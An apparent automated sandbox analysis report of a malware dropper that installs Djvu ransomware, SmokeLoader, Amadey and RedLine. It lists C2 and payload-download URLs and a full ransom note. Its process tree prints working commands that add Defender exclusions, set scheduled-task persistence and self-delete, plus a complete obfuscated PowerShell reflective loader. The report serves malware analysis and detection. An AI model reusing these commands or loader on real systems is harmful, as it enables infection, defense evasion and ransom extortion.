Resubmissions
27-03-2023 07:51 | 230327-jp31kscd46 | 10
27-03-2023 07:48 | 230327-jm8s2sed6s | 1
27-03-2023 07:35 | 230327-jeqmhacc77 | 10
Analysis
max time kernel: 693s
max time network: 696s
platform: windows10-2004_x64
resource: win10v2004-20230220-de
resource tags: arch:x64, arch:x86, image:win10v2004-20230220-de, locale:de-de, os:windows10-2004-x64, system:windows
submitted: 27-03-2023 07:51
Static task: static1
Behavioral task: behavioral1
Sample: file.exe
Resource: win10v2004-20230220-de
Errors
General
Target: file.exe
Size: 269KB
MD5: 26d85c2bdc983c43452401545f3c6007
SHA1: e18a2a223b91f426b5dab23b13970264d1da6ebc
SHA256: c8313943995590c444dac429919bc562c8f81c7d81c898fbb9bd7822dce889f4
SHA512: d652d2c4ab97507e0b61b37dc069b024a531b56e80f95a449d201ba6b0a1b6baecc33162be4f4a4571054295154c2c4c0a27f6831ac5dd37f0d27e3795fde3e5
SSDEEP: 3072:Fm6fmyQA+BF8tlkC42EVOkAz+t/lB2SpYeEvyqbxDFoio56WmxeQZn78F:zQLK42EskAhS+7fyZmB
Malware Config
Extracted
smokeloader
2022
Extracted
djvu
http://zexeq.com/lancer/get.php
extension: .typo
offline_id: Yao2o6f5vNghOpgVBhEIA8O96SC5vLcgITgaRMt1
payload_url: http://uaery.top/dl/build2.exe
payload_url: http://zexeq.com/files/1/build3.exe
ransomnote: ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-f8UEvx4T0A Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@freshmail.top Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0672IsjO
Extracted
smokeloader
pub1
Extracted
smokeloader
sprg
Extracted
amadey
3.65
77.73.134.27/8bmdh3Slb2/index.php
Extracted
redline
koreamon
koreamonitoring.com:80
auth_value: 1a0e1a9f491ef3df873a03577dfa10aa
Signatures
DcRat
DarkCrystal (DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
Detected Djvu ransomware 16 IoCs
Djvu Ransomware
Ransomware which is a variant of the STOP family.
Modifies security service 2 TTPs 5 IoCs
Processes:
description | ioc | process
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
RedLine payload 11 IoCs
SmokeLoader
Modular backdoor trojan in use since 2014.
Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
Downloads MZ/PE file
Stops running service(s) 3 TTPs
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation | Player3.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation | nbveek.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation | 2810.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation | C424.bat.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation | WScript.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation | E3BD.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation | E3BD.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation | 19A7.exe
Executes dropped EXE 42 IoCs
Loads dropped DLL 5 IoCs
Processes:
pid | process
5060 | rundll32.exe
4256 | rundll32.exe
1460 | rundll32.exe
4124 | AddInProcess32.exe
4124 | AddInProcess32.exe
Modifies file permissions 1 TTPs 1 IoCs
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | dllhost.exe
Key opened | \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | dllhost.exe
Key opened | \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | dllhost.exe
Key opened | \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook | dllhost.exe
Key opened | \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook | dllhost.exe
Key opened | \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook | dllhost.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\4dbd1898-d200-4d2a-b39c-a640ea533983\\E3BD.exe\" --AutoStart" | E3BD.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" | 60711744363166210615.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Legitimate hosting services abused for malware hosting/C2 1 TTPs
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
96 | api.2ip.ua
114 | api.2ip.ua
95 | api.2ip.ua
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
description | ioc | process
File opened for modification | \??\PHYSICALDRIVE0 | BAFB.exe
Drops file in System32 directory 3 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
pid | process
5064 | E048.exe
5064 | E048.exe
5064 | E048.exe
Suspicious use of SetThreadContext 5 IoCs
Processes:
description | pid | process | target process
PID 4496 set thread context of 1116 | 4496 | E3BD.exe | E3BD.exe
PID 212 set thread context of 3696 | 212 | E3BD.exe | E3BD.exe
PID 4736 set thread context of 1968 | 4736 | updater.exe | conhost.exe
PID 4736 set thread context of 4412 | 4736 | updater.exe | conhost.exe
PID 3924 set thread context of 4124 | 3924 | F2E7.exe | AddInProcess32.exe
Drops file in Program Files directory 4 IoCs
Processes:
description | ioc | process
File created | C:\Program Files\Notepad\Chrome\updater.exe | XandETC.exe
File created | C:\Program Files\Google\Libs\WR64.sys | updater.exe
File created | C:\Program Files\Google\Libs\g.log | cmd.exe
File created | C:\Program Files\Google\Libs\g.log | cmd.exe
Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
pid | process
3212 | sc.exe
4260 | sc.exe
3440 | sc.exe
4232 | sc.exe
2204 | sc.exe
792 | sc.exe
3720 | sc.exe
1708 | sc.exe
2148 | sc.exe
924 | sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Program crash 7 IoCs
Processes:
pid | pid_target | process | target process
1312 | 4520 | WerFault.exe | ED16.exe
3856 | 3676 | WerFault.exe | 851.exe
1908 | 3796 | WerFault.exe | 2810.exe
4064 | 1460 | WerFault.exe | rundll32.exe
4160 | 5064 | WerFault.exe | E048.exe
2016 | 3844 | WerFault.exe | ibtarai
1780 | 5080 | WerFault.exe | rgtarai
Checks SCSI registry key(s) 3 TTPs 15 IoCs
SCSI information is often read in order to detect sandboxing environments.
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | dllhost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | dllhost.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | AddInProcess32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | AddInProcess32.exe
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
1844 | schtasks.exe
4832 | schtasks.exe
4160 | schtasks.exe
Delays execution with timeout.exe 1 IoCs
Processes:
pid | process
4056 | timeout.exe
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes:
description | flow | ioc
HTTP User-Agent header | 393 | Go-http-client/1.1
Modifies data under HKEY_USERS 64 IoCs
Modifies registry class 29 IoCs
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
pid | process
3172 | Explorer.EXE
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
  pid   process
  2972  taskmgr.exe
  3172  Explorer.EXE
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
  pid   process
  668
Suspicious behavior: MapViewOfSection 22 IoCs
Processes (repeated entries collapsed into a count):
  pid   process       entries
  1500  file.exe      1
  392   EA37.exe      1
  3396  5EE.exe       1
  3172  Explorer.EXE  18
  1908  wjtarai       1
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes (repeated entries collapsed into a count):
  pid   process       token                      entries
  2972  taskmgr.exe   SeDebugPrivilege           1
  2972  taskmgr.exe   SeSystemProfilePrivilege   1
  2972  taskmgr.exe   SeCreateGlobalPrivilege    1
  2972  taskmgr.exe   SeSecurityPrivilege        2
  2972  taskmgr.exe   SeTakeOwnershipPrivilege   2
  3172  Explorer.EXE  SeShutdownPrivilege        29
  3172  Explorer.EXE  SeCreatePagefilePrivilege  28
Suspicious use of FindShellTrayWindow 64 IoCs
Processes (repeated entries collapsed into a count):
  pid   process      entries
  2972  taskmgr.exe  64
Suspicious use of SendNotifyMessage 64 IoCs
Processes (repeated entries collapsed into a count):
  pid   process      entries
  2972  taskmgr.exe  64
Suspicious use of SetWindowsHookEx 12 IoCs
Processes (repeated entries collapsed into a count):
  pid   process       entries
  3172  Explorer.EXE  12
Suspicious use of WriteProcessMemory 64 IoCs
Processes (source wrote to memory of target; repeated entries collapsed into a count):
  source pid  source process  target pid  target process  entries
  3172        Explorer.EXE    4496        E3BD.exe        3
  4496        E3BD.exe        1116        E3BD.exe        10
  3172        Explorer.EXE    392         EA37.exe        3
  3172        Explorer.EXE    4520        ED16.exe        3
  1116        E3BD.exe        3212        icacls.exe      3
  1116        E3BD.exe        212         E3BD.exe        3
  212         E3BD.exe        3696        E3BD.exe        10
  3172        Explorer.EXE    3396        5EE.exe         3
  3172        Explorer.EXE    3676        851.exe         3
  3696        E3BD.exe        780         build3.exe      3
  780         build3.exe      4832        schtasks.exe    3
  3172        Explorer.EXE    3048        19A7.exe        3
  3048        19A7.exe        3792        Player3.exe     3
  3048        19A7.exe        4092        ss31.exe        2
  3048        19A7.exe        4996        XandETC.exe     2
  3792        Player3.exe     4576        nbveek.exe      3
  4576        nbveek.exe      4160        schtasks.exe    3
  4576        nbveek.exe      3232        cmd.exe         1
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
outlook_office_path 1 IoCs
Processes:
  description  ioc  process
  Key opened  \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook  dllhost.exe
outlook_win_path 1 IoCs
Processes:
  description  ioc  process
  Key opened  \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook  dllhost.exe
Processes (image path, then its command line and observed behaviours; indentation shows the parent/child depth)

C:\Windows\Explorer.EXE
  cmd: C:\Windows\Explorer.EXE
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\AppData\Local\Temp\file.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\file.exe"
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection

  C:\Windows\system32\taskmgr.exe
    cmd: "C:\Windows\system32\taskmgr.exe" /4
    - Checks SCSI registry key(s)
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage

  C:\Users\Admin\AppData\Local\Temp\E3BD.exe
    cmd: C:\Users\Admin\AppData\Local\Temp\E3BD.exe
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Local\Temp\E3BD.exe
      cmd: C:\Users\Admin\AppData\Local\Temp\E3BD.exe
      - Checks computer location settings
      - Executes dropped EXE
      - Adds Run key to start application
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\icacls.exe
        cmd: icacls "C:\Users\Admin\AppData\Local\4dbd1898-d200-4d2a-b39c-a640ea533983" /deny *S-1-1-0:(OI)(CI)(DE,DC)
        - Modifies file permissions

      C:\Users\Admin\AppData\Local\Temp\E3BD.exe
        cmd: "C:\Users\Admin\AppData\Local\Temp\E3BD.exe" --Admin IsNotAutoStart IsNotTask
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        - Suspicious use of WriteProcessMemory

        C:\Users\Admin\AppData\Local\Temp\E3BD.exe
          cmd: "C:\Users\Admin\AppData\Local\Temp\E3BD.exe" --Admin IsNotAutoStart IsNotTask
          - Checks computer location settings
          - Executes dropped EXE
          - Suspicious use of WriteProcessMemory

          C:\Users\Admin\AppData\Local\7e557038-2294-4470-b05e-035177f746a6\build3.exe
            cmd: "C:\Users\Admin\AppData\Local\7e557038-2294-4470-b05e-035177f746a6\build3.exe"
            - Executes dropped EXE
            - Suspicious use of WriteProcessMemory

            C:\Windows\SysWOW64\schtasks.exe
              cmd: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
              - Creates scheduled task(s)

  C:\Users\Admin\AppData\Local\Temp\EA37.exe
    cmd: C:\Users\Admin\AppData\Local\Temp\EA37.exe
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection

  C:\Users\Admin\AppData\Local\Temp\ED16.exe
    cmd: C:\Users\Admin\AppData\Local\Temp\ED16.exe
    - Executes dropped EXE

    C:\Windows\SysWOW64\WerFault.exe
      cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 340
      - Program crash

  C:\Users\Admin\AppData\Local\Temp\5EE.exe
    cmd: C:\Users\Admin\AppData\Local\Temp\5EE.exe
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection

  C:\Users\Admin\AppData\Local\Temp\851.exe
    cmd: C:\Users\Admin\AppData\Local\Temp\851.exe
    - Executes dropped EXE

    C:\Windows\SysWOW64\WerFault.exe
      cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 3676 -s 340
      - Program crash

  C:\Users\Admin\AppData\Local\Temp\19A7.exe
    cmd: C:\Users\Admin\AppData\Local\Temp\19A7.exe
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Local\Temp\Player3.exe
      cmd: "C:\Users\Admin\AppData\Local\Temp\Player3.exe"
      - Checks computer location settings
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory

      C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
        cmd: "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"
        - Checks computer location settings
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\schtasks.exe
          cmd: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F
          - Creates scheduled task(s)

        C:\Windows\SysWOW64\cmd.exe
          cmd: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "Admin:N"&&CACLS "..\16de06bfb4" /P "Admin:R" /E&&Exit

          C:\Windows\SysWOW64\cmd.exe
            cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"

          C:\Windows\SysWOW64\cacls.exe
            cmd: CACLS "nbveek.exe" /P "Admin:N"

          C:\Windows\SysWOW64\cacls.exe
            cmd: CACLS "nbveek.exe" /P "Admin:R" /E

          C:\Windows\SysWOW64\cmd.exe
            cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"

          C:\Windows\SysWOW64\cacls.exe
            cmd: CACLS "..\16de06bfb4" /P "Admin:N"

          C:\Windows\SysWOW64\cacls.exe
            cmd: CACLS "..\16de06bfb4" /P "Admin:R" /E

        C:\Windows\SysWOW64\rundll32.exe
          cmd: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
          - Loads dropped DLL

          C:\Windows\system32\rundll32.exe
            cmd: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
            - Loads dropped DLL

            C:\Windows\system32\WerFault.exe
              cmd: C:\Windows\system32\WerFault.exe -u -p 1460 -s 652
              - Program crash

        C:\Windows\SysWOW64\rundll32.exe
          cmd: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\clip64.dll, Main
          - Loads dropped DLL

    C:\Users\Admin\AppData\Local\Temp\ss31.exe
      cmd: "C:\Users\Admin\AppData\Local\Temp\ss31.exe"
      - Executes dropped EXE

    C:\Users\Admin\AppData\Local\Temp\XandETC.exe
      cmd: "C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Executes dropped EXE
      - Drops file in Program Files directory

  C:\Users\Admin\AppData\Local\Temp\2810.exe
    cmd: C:\Users\Admin\AppData\Local\Temp\2810.exe
    - Checks computer location settings
    - Executes dropped EXE

    C:\Users\Admin\AppData\Local\Temp\Player3.exe
      cmd: "C:\Users\Admin\AppData\Local\Temp\Player3.exe"
      - Executes dropped EXE

    C:\Windows\SysWOW64\WerFault.exe
      cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 1520
      - Program crash

  C:\Users\Admin\AppData\Local\Temp\88BF.exe
    cmd: C:\Users\Admin\AppData\Local\Temp\88BF.exe
    - Executes dropped EXE

  C:\Users\Admin\AppData\Local\Temp\BAFB.exe
    cmd: C:\Users\Admin\AppData\Local\Temp\BAFB.exe
    - Executes dropped EXE
    - Writes to the Master Boot Record (MBR)

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C424.bat" "

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmd: powershell -w hidden -c #

    C:\Users\Admin\AppData\Local\Temp\C424.bat.exe
      cmd: "C:\Users\Admin\AppData\Local\Temp\C424.bat.exe" function PX($c){$c.Replace('EOIUi', '')}$UcNH=PX 'GeEOIUitCurEOIUirenEOIUitPrEOIUioceEOIUissEOIUi';$LMam=PX 'REOIUieaEOIUidLEOIUiinEOIUieEOIUisEOIUi';$nIei=PX 'CEOIUihEOIUiangEOIUieEOIUiExteEOIUinEOIUisiEOIUionEOIUi';$GDjp=PX 'InEOIUivokEOIUieEOIUi';$cJOL=PX 'FEOIUiirsEOIUitEOIUi';$bNvC=PX 'EntrEOIUiyPoEOIUiiEOIUintEOIUi';$ZDDe=PX 'FroEOIUimBEOIUiaseEOIUi64SEOIUitrEOIUiingEOIUi';$wEka=PX 'LoaEOIUidEOIUi';$xsru=PX 'CreEOIUiatEOIUieDEOIUiecrEOIUiyEOIUipEOIUitoEOIUirEOIUi';$JaHM=PX 'TrEOIUianEOIUisforEOIUimFEOIUiinEOIUialEOIUiBlEOIUiockEOIUi';function AyMSx($aADFu){$mkeZq=[System.Security.Cryptography.Aes]::Create();$mkeZq.Mode=[System.Security.Cryptography.CipherMode]::CBC;$mkeZq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$mkeZq.Key=[System.Convert]::$ZDDe('33o4mPrkfBEGS8RPjJSCxTGdyodbZrRhtRuNUH5rzRk=');$mkeZq.IV=[System.Convert]::$ZDDe('Pw0jyFBtnQYUrNsqUX5AOg==');$kgbNu=$mkeZq.$xsru();$gGieg=$kgbNu.$JaHM($aADFu,0,$aADFu.Length);$kgbNu.Dispose();$mkeZq.Dispose();$gGieg;}function QpgTW($aADFu){$lUmJr=New-Object System.IO.MemoryStream(,$aADFu);$vxHfp=New-Object System.IO.MemoryStream;$CEpcv=New-Object System.IO.Compression.GZipStream($lUmJr,[IO.Compression.CompressionMode]::Decompress);$CEpcv.CopyTo($vxHfp);$CEpcv.Dispose();$lUmJr.Dispose();$vxHfp.Dispose();$vxHfp.ToArray();}function jfGQF($aADFu,$OnnHT){[System.Reflection.Assembly]::$wEka([byte[]]$aADFu).$bNvC.$GDjp($null,$OnnHT);}$oEcWz=[System.Linq.Enumerable]::$cJOL([System.IO.File]::$LMam([System.IO.Path]::$nIei([System.Diagnostics.Process]::$UcNH().MainModule.FileName, $null)));$fmJXF = $oEcWz.Substring(3).Split('\');$xAiAZ=QpgTW (AyMSx ([Convert]::$ZDDe($fmJXF[0])));$AjQdR=QpgTW (AyMSx ([Convert]::$ZDDe($fmJXF[1])));jfGQF $AjQdR $null;jfGQF $xAiAZ $null;
      - Checks computer location settings
      - Executes dropped EXE
      - Modifies registry class

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(3328);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        cmd: "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\C424')

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_JGAbA' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\JGAbA.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

      C:\Windows\SysWOW64\WScript.exe
        cmd: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\JGAbA.vbs"
        - Checks computer location settings

        C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\JGAbA.bat" "

          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            cmd: powershell -w hidden -c #

          C:\Users\Admin\AppData\Roaming\JGAbA.bat.exe
            cmd: "C:\Users\Admin\AppData\Roaming\JGAbA.bat.exe" function PX($c){$c.Replace('EOIUi', '')}$UcNH=PX 'GeEOIUitCurEOIUirenEOIUitPrEOIUioceEOIUissEOIUi';$LMam=PX 'REOIUieaEOIUidLEOIUiinEOIUieEOIUisEOIUi';$nIei=PX 'CEOIUihEOIUiangEOIUieEOIUiExteEOIUinEOIUisiEOIUionEOIUi';$GDjp=PX 'InEOIUivokEOIUieEOIUi';$cJOL=PX 'FEOIUiirsEOIUitEOIUi';$bNvC=PX 'EntrEOIUiyPoEOIUiiEOIUintEOIUi';$ZDDe=PX 'FroEOIUimBEOIUiaseEOIUi64SEOIUitrEOIUiingEOIUi';$wEka=PX 'LoaEOIUidEOIUi';$xsru=PX 'CreEOIUiatEOIUieDEOIUiecrEOIUiyEOIUipEOIUitoEOIUirEOIUi';$JaHM=PX 'TrEOIUianEOIUisforEOIUimFEOIUiinEOIUialEOIUiBlEOIUiockEOIUi';function AyMSx($aADFu){$mkeZq=[System.Security.Cryptography.Aes]::Create();$mkeZq.Mode=[System.Security.Cryptography.CipherMode]::CBC;$mkeZq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$mkeZq.Key=[System.Convert]::$ZDDe('33o4mPrkfBEGS8RPjJSCxTGdyodbZrRhtRuNUH5rzRk=');$mkeZq.IV=[System.Convert]::$ZDDe('Pw0jyFBtnQYUrNsqUX5AOg==');$kgbNu=$mkeZq.$xsru();$gGieg=$kgbNu.$JaHM($aADFu,0,$aADFu.Length);$kgbNu.Dispose();$mkeZq.Dispose();$gGieg;}function QpgTW($aADFu){$lUmJr=New-Object System.IO.MemoryStream(,$aADFu);$vxHfp=New-Object System.IO.MemoryStream;$CEpcv=New-Object System.IO.Compression.GZipStream($lUmJr,[IO.Compression.CompressionMode]::Decompress);$CEpcv.CopyTo($vxHfp);$CEpcv.Dispose();$lUmJr.Dispose();$vxHfp.Dispose();$vxHfp.ToArray();}function jfGQF($aADFu,$OnnHT){[System.Reflection.Assembly]::$wEka([byte[]]$aADFu).$bNvC.$GDjp($null,$OnnHT);}$oEcWz=[System.Linq.Enumerable]::$cJOL([System.IO.File]::$LMam([System.IO.Path]::$nIei([System.Diagnostics.Process]::$UcNH().MainModule.FileName, $null)));$fmJXF = $oEcWz.Substring(3).Split('\');$xAiAZ=QpgTW (AyMSx ([Convert]::$ZDDe($fmJXF[0])));$AjQdR=QpgTW (AyMSx ([Convert]::$ZDDe($fmJXF[1])));jfGQF $AjQdR $null;jfGQF $xAiAZ $null;

            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(1968);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;

            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')

            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmd: "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\JGAbA')

            C:\Users\Admin\AppData\Local\Temp\394108.exe
              cmd: "C:\Users\Admin\AppData\Local\Temp\394108.exe"
              - Executes dropped EXE

            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(1312);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;

  C:\Windows\System32\cmd.exe
